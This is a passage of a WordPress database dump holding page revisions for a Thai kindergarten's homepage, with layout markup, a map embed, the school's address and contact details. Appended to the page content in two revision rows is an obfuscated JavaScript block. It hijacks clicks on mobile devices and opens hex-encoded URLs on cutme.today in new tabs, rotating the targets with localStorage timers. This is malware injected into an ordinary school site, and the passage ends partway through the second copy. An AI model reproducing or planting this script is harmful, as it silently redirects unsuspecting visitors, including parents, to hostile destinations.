/-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:30:12','2024-09-24 04:30:12','',19,'http://watprato.ssk.in.th/?p=428',0,'revision','',0),
(430,2,'2024-09-24 11:35:46','2024-09-24 04:35:46','{{unknown}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 